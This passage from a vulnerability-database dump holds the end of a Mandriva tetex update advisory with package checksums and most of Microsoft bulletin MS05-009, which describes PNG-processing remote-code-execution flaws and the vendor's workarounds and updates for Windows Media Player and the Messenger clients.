x86_64/10.2/RPMS/tetex-texi2html-3.0-8.2.102mdk.x86_64.rpm\r\n 54cfa5d726e5b53a2811e601c351b8c9 x86_64/10.2/RPMS/tetex-xdvi-3.0-8.2.102mdk.x86_64.rpm\r\n 1ed4d39c162d2153a7741effdedcd7ad x86_64/10.2/RPMS/xmltex-1.9-54.2.102mdk.x86_64.rpm\r\n 73dffa296703ab7de146d3fbe811ab10 x86_64/10.2/SRPMS/tetex-3.0-8.2.102mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0:\r\n c0cc16cb92ca140fa0cd77ab3082334c 2006.0/RPMS/jadetex-3.12-110.2.20060mdk.i586.rpm\r\n 2a599e06878cfd913ee2460352d18833 2006.0/RPMS/tetex-3.0-12.2.20060mdk.i586.rpm\r\n 80577accadf3ccede359d1c305e3cb62 2006.0/RPMS/tetex-afm-3.0-12.2.20060mdk.i586.rpm\r\n b1e27b6283a17194ef4feead5033b939 2006.0/RPMS/tetex-context-3.0-12.2.20060mdk.i586.rpm\r\n e735ccd87def0f4a8bf1262aa3d92ca6 2006.0/RPMS/tetex-devel-3.0-12.2.20060mdk.i586.rpm\r\n dbd71f3daf27a1bafba42eb0051f2fab 2006.0/RPMS/tetex-doc-3.0-12.2.20060mdk.i586.rpm\r\n eea80943eaef26d2d0d40d4ef7e183aa 2006.0/RPMS/tetex-dvilj-3.0-12.2.20060mdk.i586.rpm\r\n 05ce22c18eb82c10a6306cbe8d2446fa 2006.0/RPMS/tetex-dvipdfm-3.0-12.2.20060mdk.i586.rpm\r\n 0d1270c9b9f940d3206aaa1be682b1cf 2006.0/RPMS/tetex-dvips-3.0-12.2.20060mdk.i586.rpm\r\n 962a78f23d0607544ffa35045b7af955 2006.0/RPMS/tetex-latex-3.0-12.2.20060mdk.i586.rpm\r\n 4e823ca61b25f0285c75dc1886947e73 2006.0/RPMS/tetex-mfwin-3.0-12.2.20060mdk.i586.rpm\r\n 44df21439b36aa5e9b60055b4f77936d 2006.0/RPMS/tetex-texi2html-3.0-12.2.20060mdk.i586.rpm\r\n 8eab912c43ee68f35cdd1f9480d5951c 2006.0/RPMS/tetex-xdvi-3.0-12.2.20060mdk.i586.rpm\r\n 6d8ba515e52f4abfd54dd306174462c7 2006.0/RPMS/xmltex-1.9-58.2.20060mdk.i586.rpm\r\n 81d035449228282e7a72419f4b260e7a 2006.0/SRPMS/tetex-3.0-12.2.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n 0466f60289f9ce688130e6d0a508e8bc x86_64/2006.0/RPMS/jadetex-3.12-110.2.20060mdk.x86_64.rpm\r\n faf6465bf63a2f6719def5d3fb17ef17 x86_64/2006.0/RPMS/tetex-3.0-12.2.20060mdk.x86_64.rpm\r\n 32f99226647319d5347d19077788bd5b x86_64/2006.0/RPMS/tetex-afm-3.0-12.2.20060mdk.x86_64.rpm\r\n 1d1aaee40dad532423173ccea3849e75 x86_64/2006.0/RPMS/tetex-context-3.0-12.2.20060mdk.x86_64.rpm\r\n 10d68d89752022e5bdf74ff0b07f1884 x86_64/2006.0/RPMS/tetex-devel-3.0-12.2.20060mdk.x86_64.rpm\r\n 309c4b8d26fd7b6531b9ab183256191c x86_64/2006.0/RPMS/tetex-doc-3.0-12.2.20060mdk.x86_64.rpm\r\n 1afd5620adaad5e7a43a5f5b08aec37d x86_64/2006.0/RPMS/tetex-dvilj-3.0-12.2.20060mdk.x86_64.rpm\r\n db2d9cc973c213cc3abe78bdf919c4bc x86_64/2006.0/RPMS/tetex-dvipdfm-3.0-12.2.20060mdk.x86_64.rpm\r\n e1dffcb652dc8d246d0da1ec6620bd05 x86_64/2006.0/RPMS/tetex-dvips-3.0-12.2.20060mdk.x86_64.rpm\r\n e792f17a436aae19883b979f32c08a33 x86_64/2006.0/RPMS/tetex-latex-3.0-12.2.20060mdk.x86_64.rpm\r\n b992bf51cb291e396a4a7f5d75bd2e84 x86_64/2006.0/RPMS/tetex-mfwin-3.0-12.2.20060mdk.x86_64.rpm\r\n eade7aa0e9665969c8d73bb7909da672 x86_64/2006.0/RPMS/tetex-texi2html-3.0-12.2.20060mdk.x86_64.rpm\r\n f1e9462e7213c74bcc59c27242b8d03b x86_64/2006.0/RPMS/tetex-xdvi-3.0-12.2.20060mdk.x86_64.rpm\r\n 4d1ade13bb2ffed71cb2f6d45165a672 x86_64/2006.0/RPMS/xmltex-1.9-58.2.20060mdk.x86_64.rpm\r\n 81d035449228282e7a72419f4b260e7a x86_64/2006.0/SRPMS/tetex-3.0-12.2.20060mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFEoa+vmqjQ0CJFipgRAmsqAKCDUHSEmHsPgDtQw43QlcPkN0HbnACfQrNM\r\naLENiehuiJNvmKyOFy6DVuo=\r\n=7QK6\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-06-28T00:00:00", "published": "2006-06-28T00:00:00", "id": "SECURITYVULNS:DOC:13353", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13353", "title": "[Full-disclosure] [ MDKSA-2006:113 ] - Updated tetex packages fix embedded GD vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS05-009\r\nVulnerability in PNG Processing Could Allow Remote Code Execution &#40;890261&#41;\r\n\r\nIssued: February 8, 2005\r\nVersion: 1.0\r\n\r\nSummary\r\nWho should read this document: Customers who use Microsoft Windows Media Player, Windows Messenger and MSN Messenger\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions &#40;FAQ&#41; section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software: \r\n\r\n\u2022 Microsoft Windows Media Player 9 Series &#40;when running on Windows 2000, Windows XP Service Pack 1 and Windows Server 2003&#41; \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 5.0 &#40;standalone version that can be installed on all supported operating systems&#41; \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.1 \u2013 Download the update\r\n \r\n\u2022 Microsoft MSN Messenger 6.2 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition &#40;SE&#41;, and Microsoft Windows Millennium Edition &#40;ME&#41; \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n \r\n\r\nNon-Affected Software: \r\n\r\n\u2022 Windows Media Player 6.4\r\n \r\n\u2022 Windows Media Player 7.1\r\n \r\n\u2022 Windows Media Player for Windows XP &#40;8.0&#41;\r\n \r\n\u2022 Windows Media Player 9 Series for Windows XP Service Pack 2\r\n \r\n\u2022 Windows Media Player 10\r\n \r\n\u2022 MSN Messenger for Mac\r\n \r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\r\n\u2022 Microsoft Windows Messenger version 4.7.0.2009 &#40;when running on Windows XP Service Pack 1&#41; \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Messenger version 4.7.0.3000 &#40;when running on Windows XP Service Pack 2&#41; \u2013 Download the update\r\n \r\n\r\nThe software in this list has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the following Microsoft Support Lifecycle Web site.\r\n\r\nTop of section\r\nGeneral Information\r\n Executive Summary \r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, public vulnerability. A remote code execution vulnerability exists in the processing of PNG image formats. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifiers Impact of Vulnerability Windows Media Player 9 Series CAN-2004-1244 Windows Messenger &#40;All affected versions&#41; CAN-2004-0597 MSN Messenger 6.1 and 6.2 CAN-2004-0597 \r\nPNG Processing Vulnerability- CAN-2004-1244\r\n Remote Code Execution\r\n Critical\r\n\r\n None\r\n None\r\n \r\nPNG Processing Vulnerability- CAN-2004-0597\r\n Remote Code Execution\r\n\r\n None\r\n Moderate\r\n Critical\r\n\r\n \r\nAggregate Severity of All Vulnerabilities\r\n \r\n Critical\r\n Moderate\r\n\r\n Critical\r\n\r\n \r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nTop of section\r\n Frequently asked questions &#40;FAQ&#41; related to this security update \r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security bulletin for Windows Media Player only. The security bulletin ID and version that is affected is listed in the following table.\r\n\r\nBulletin ID Windows Media Player 9 Series MSN Messenger 6.1 \r\nMS03-021\r\n Replaced\r\n \r\n \r\nMS04-010\r\n \r\n Replaced\r\n \r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nNote A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by any of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nHow can I get an update for MSN Messenger?\r\nAn update for MSN Messenger is available via the download link under the Affected Software section of this bulletin. Additionally, an updated version of MSN Messenger will be offered directly to customers when they log into MSN Messenger beginning shortly after this update is released.\r\n\r\nWhy is the update to Windows Messenger 5.0 an upgrade to version 5.1 instead of an update to 5.0?\r\nDue to the architecture of Windows Messenger 5.0, it is not possible to provide an incremental patch. Any fix to Windows Messenger 5.0 requires the deployment of a completely updated Windows Messenger package, in this case the Windows Messenger 5.1 package.\r\n\r\nWhat functionality changes will this new version of Windows Messenger contain?\r\nAs well as including the security fix pertaining to this bulletin; Windows Messenger 5.1 contains some additional bug fixes over Windows Messenger 5.0. Full details are on the Windows Messenger 5.1 download page.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; to determine if this update is required?\r\nMBSA will determine if this update is required for Windows Media Player. MBSA will not determine if this update is required for Windows Messenger or MSN Messenger. It will provide a note message to this effect. See Microsoft Knowledge Base Article 306460 for information regarding note messages in MBSA.\r\n\r\nMicrosoft has made available an Enterprise Update Scanning Tool &#40;EST&#41; to assist customers with the detection of needed security updates not currently supported by MBSA.\r\n\r\nFor detailed information about the programs that MBSA currently does not detect, see Microsoft Knowledge Base Article 306460\r\n\r\nWhat is the Enterprise Update Scanning Tool &#40;EST&#41;?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer &#40;MBSA&#41; and the Office Detection Tool &#40;ODT&#41; cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scanning Tool &#40;EST&#41; and is designed for enterprise administrators. When a version of the Enterprise Update Scanning Tool is created for a specific bulletin, customers can run the tool from a command line interface &#40;CLI&#41; and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that SMS customers can obtain that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scanning Tool &#40;EST&#41; to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you need to apply this update for all of the products listed under Affected Products above. Microsoft Knowledge Base Article 984193 describes the EST in detail, as well as provides a download link to the tool. There is also a version of this tool that SMS customers can obtain. See the following Microsoft Knowledge Base Article 894154.\r\n\r\nCan I use Systems Management Server &#40;SMS&#41; to determine if this update is required?\r\nYes. SMS can help detect and deploy this security update. SMS uses MBSA for detection; therefore, SMS has the same limitation listed earlier in this bulletin related to programs that MBSA does not detect. Additionally, there is a version of the EST that SMS customers can obtain that offers an integrated experience for SMS administrators. \r\nFor information about SMS, visit the SMS Web site.\r\n\r\nThe Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\n\r\nTop of section\r\n Vulnerability Details \r\n\r\n PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nA remote code execution vulnerability exists in Windows Media Player because it does not properly handle PNG files with excessive width or height values. An attacker could try to exploit the vulnerability by constructing a malicious PNG that could potentially allow remote code execution if a user visited a malicious Web site or clicked a link in a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Media Player- CAN-2004-1244: \r\n\r\n\u2022 In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability through media containing a reference to a malicious PNG file. An attacker would have no way to force users to visit a Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker&#39;s site or to a site that has been compromised by the attacker.\r\n \r\n\u2022 An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nThere are several different attack vectors that Microsoft has identified for this vulnerability. Each attack vector has a different workaround.\r\n\r\n Static WMP File Extension Attack workaround \r\n\r\nDisassociate the WMP file extensions.\r\nDisassociate the file extensions &#40;.ASX, .WAX, .WVX, .WPL, .WMX, .WMS, .WMZ&#41; in Windows to avoid previewing or opening files that point to malformed PNG files.\r\n\r\nManual Steps \u2013 Windows Media Player method:\r\n\r\n\u2022 Launch Windows Explorer\r\n \r\n\u2022 On the Tools Menu select \u2018Folder Options\u2019\r\n \r\n\u2022 Select the \u2018File Types\u2019 tab\r\n \r\n\u2022 Scroll to find the .ASX file extension and then press the \u2018Delete\u2019 button\r\n \r\n\u2022 Repeat step 4 for each of the file extensions listed above.\r\n \r\n\r\nIn addition, enterprise customers can configure Outlook to block the dangerous files listed using the steps documented in Microsoft Knowledgebase Article 837388. Use these instructions to add the documented file extensions to the Level1 block list.\r\n\r\nHome users can configure Outlook Express to block the dangerous files listed using the steps documented in Microsoft Knowledge Base Article 291387. Use this information to configure each of the file extensions as \u2018confirm open after download\u2019 in the Windows file types dialog.\r\n\r\nImpact of Workaround: Deleting the file associations with Media Player has a high potential for breaking corporate users who may be using Windows Media Server / Player to deliver web casts, training etc.\r\n\r\nHome users trying to watch streaming content on various Web sites may also be impacted by implementing this workaround.\r\n\r\nTop of section\r\n Internet Explorer workaround for WMP ActiveX attack \r\n\r\nDisable the Windows Media Player ActiveX Control. To prevent against an attack within a webpage follow these steps to disable the Windows Media Player ActiveX Control:\r\n\r\nFollow the instructions documented in Microsoft Knowledge Base Article 240797 to killbit the following CLSIDs in Internet Explorer:\r\n\r\nCLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7\r\nCLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1\r\nCLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2\r\n\r\nImpact of Workaround:\r\n\r\nWhen you disable the Windows Media Player ActiveX control, pages using this control will no longer function as designed. This prevents any content from being played though the control, including audio and video.\r\n\r\nTop of section\r\n Content-Type HTTP Header Attack \r\n\r\nThe only way to prevent this attack is to remove all of the possible MIME type entries from the registry that associate Windows Media Player with the MIME type listed in the Content-Type header being returned by the server since they all can be abused to exploit the vulnerability. Below is a list of MIME types that are associated with the WMP CLSID.\r\n\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;application/vnd.ms-wpl\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;application/x-mplayer2\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;application/x-ms-wmd\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;application/x-ms-wmz\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/aiff\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/basic\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/mid\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/midi\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/mp3\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/mpeg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/mpegurl\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/mpg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/wav\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-aiff\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-mid\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-midi\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-mp3\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-mpeg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-mpegurl\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-mpg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-ms-wax\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-ms-wma\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;audio/x-wav\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;midi/mid\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/avi\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/mpeg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/mpg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/msvideo\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ivf\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-mpeg\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-mpeg2a\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-asf\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-asf-plugin\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-msvideo\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-wm\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-wmp\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-wmv\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-wmx\r\nHKEY_CLASSES_ROOT&#92;MIME&#92;Database&#92;Content Type&#92;video/x-ms-wvx\r\n\r\nImpact of Workaround:\r\n\r\n\u2022 These MIME type registry keys all have a CLSID value which points to the following CLSID:\r\nHKEY_CLASSES_ROOT&#92;CLSID&#92;{CD3AFA8F-B84F-48F0-9393-7EDC34128127}&#92;InprocServer32\r\nThis CLSID is associated with WMP.DLL which is responsible for launching Windows Media Player when these MIME types are used. Un-registering WMP.DLL will break Windows Media Player.\r\n \r\n\u2022 The MIME types listed in this workaround are specific to Windows XP. There may be additional MIME types available on other platforms.\r\n \r\n\r\nAdditional information about Windows Media Player File Name Extensions if available at the following MSDN Web site.\r\n\r\nTop of section\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Media Player does not completely validate PNG image formats with a excessive width or height values.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics &#40;PNG&#41; format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could host a malformed PNG file on a Web site, network share, or persuade a user to open a PNG file that is sent as an attachment in email could seek to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by hosting a specially crafted PNG file on a Web site or network share, and entice a user to visit that Web site. Additionally, and attacker could send a link to a malicious PNG file in an email message and entice a user to click on the link.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nWindows 98 is not critically affected by this vulnerability, however Windows 98 Second Edition, and Windows Millennium Edition are. A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by modifying the way that Windows Media Player validates the width and height of a PNG file\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nA vulnerability similar to this has been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597.\r\n\r\nIs this vulnerability the same as the vulnerability described in CAN-2004-0597?\r\nWhile similar to the vulnerability described here, Windows Media Player does not use or incorporate the affected libpng library. However, Windows Media Player is configured in such a way that makes it susceptible to the vulnerability described here.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in Windows Messenger because it does not properly handle corrupt or malformed PNG files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\n\u2022 The nature of the vulnerability is different in Windows Messenger than in MSN Messenger or Windows Media Player. The vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability.\r\n \r\n\u2022 A user would have to be running Windows Messenger and have it configured to receive .NET Alerts.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nTurn off the .NET Alerts feature in Windows Messenger.\r\n\r\n\u2022 Open Windows Messenger\r\n \r\n\u2022 Go to the Tools menu and select \u201cOptions\u201d\r\n \r\n\u2022 In the Options Dialog go to the \u201cPrivacy\u201d tab.\r\n \r\n\u2022 Check the option that says \u201cDon\u2019t download any tabs to my computer\u201d\r\n \r\n\r\nNote this setting will take effect the next time you sign into Windows Messenger.\r\n.Net Alerts are only available on Passport accounts that have signed up to receive them. Users who have never configured their account to receive these alerts will not have this setting available.\r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics &#40;PNG&#41; format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nThe vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server. Simply sending a malformed PNG image file to Windows Messenger does not exploit this vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site.\r\n\r\nCould the vulnerability be exploited over the Internet? \r\nNo. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server.\r\nSimply sending a malformed PNG to Windows Messenger does not exploit this vulnerability. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT Professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by updating the library used by Windows Messenger to one that completely validates the PNG image file that is being processed. Additionally, Windows Messenger will now validate that PNG image files are properly formatted.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597, CAN-2004-0598 and CAN-2004-0599.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in MSN Messenger because it does not properly handle corrupt or malformed PNG image files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\n\u2022 MSN Messenger, by default, does not allow anonymous people to send you messages. An attacker would first need to entice you to add them to your contacts list.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\n\u2022 Do not add addresses that you do not recognize or trust to your contacts list.\r\n \r\n\u2022 Review all of the contacts currently in your contact list and remove or block any that you do not know, do not trust or no longer need.\r\n \r\n\u2022 Disable display picture in MSN Messenger using the following steps:\r\n\r\nClick Tools. Click Options. Click the Personal Tab\r\n\r\nClear the check box \u2018Show Display Picture from Others in Instant Message Conversations\u2019.\r\n \r\n\u2022 Disable Emoticons using the following steps:\r\n\r\nClick Tools. Click Options. Click the Messages Tab\r\n\r\nClear the check box \u2018Show emoticons in instant messages\u2019\r\n\r\nClear the check box \u2018Show custom emoticons in instant message\u2019.\r\n \r\n\u2022 Do not agree to accept file transfers from contacts you do not know or trust.\r\n \r\n\r\nTop of section\r\n FAQ for PNG Processing 